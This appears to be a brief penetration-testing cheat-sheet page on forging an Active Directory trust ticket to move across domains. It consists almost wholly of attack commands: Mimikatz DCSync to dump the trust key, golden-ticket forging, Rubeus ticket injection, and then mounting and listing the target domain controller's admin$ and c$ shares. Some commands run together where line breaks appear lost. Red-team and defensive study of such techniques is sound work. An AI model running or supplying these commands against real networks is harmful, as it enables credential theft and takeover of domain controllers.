Forge Trust Ticket
Exploitation
# Dumping the trust key with Mimikatz
lsadump::dcsync /user:$domain$kerberos::golden /domain:$domain /sid:$domainsid /rc4:$krbtgthash /user:Administrator /service:krbtgt /target:$targetdomain /ticket:trust.kirbi.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/$targetdomain /ptt /dc:$targetdc# Confirm access with net use
net use \\$targetdc\admin$
# List the contents of the target domain controller
dir \\$targetdc\admin$
dir \\$targetdc\c$References
Last updated